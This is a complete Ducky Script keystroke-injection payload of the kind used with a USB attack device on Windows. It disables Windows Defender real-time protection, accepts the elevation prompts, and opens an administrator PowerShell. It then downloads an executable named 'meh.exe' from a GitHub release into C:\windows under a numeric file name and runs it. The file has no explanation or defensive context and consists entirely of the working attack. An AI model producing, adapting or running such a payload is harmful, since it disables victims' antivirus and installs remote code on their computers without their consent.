DELAY 750

REM Open Windows Defender Settings
CTRL ESC
DELAY 750
STRING windows security
DELAY 250
ENTER
DELAY 4000
ENTER

REM Navigate to Manage Settings
DELAY 1500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100

REM Open and turn off Realtime Protection
SPACE
DELAY 1000
ALT y
DELAY 1000

REM Exit security settings
ALT F4
DELAY 500

WINDOWS d
DELAY 950
WINDOWS r
DELAY 650
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
SPACE
DELAY 1500
ALT y
DELAY 1200
STRING $url = "https://github.com/ShadowByte098/sillysound/releases/download/bleh/meh.exe"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
ENTER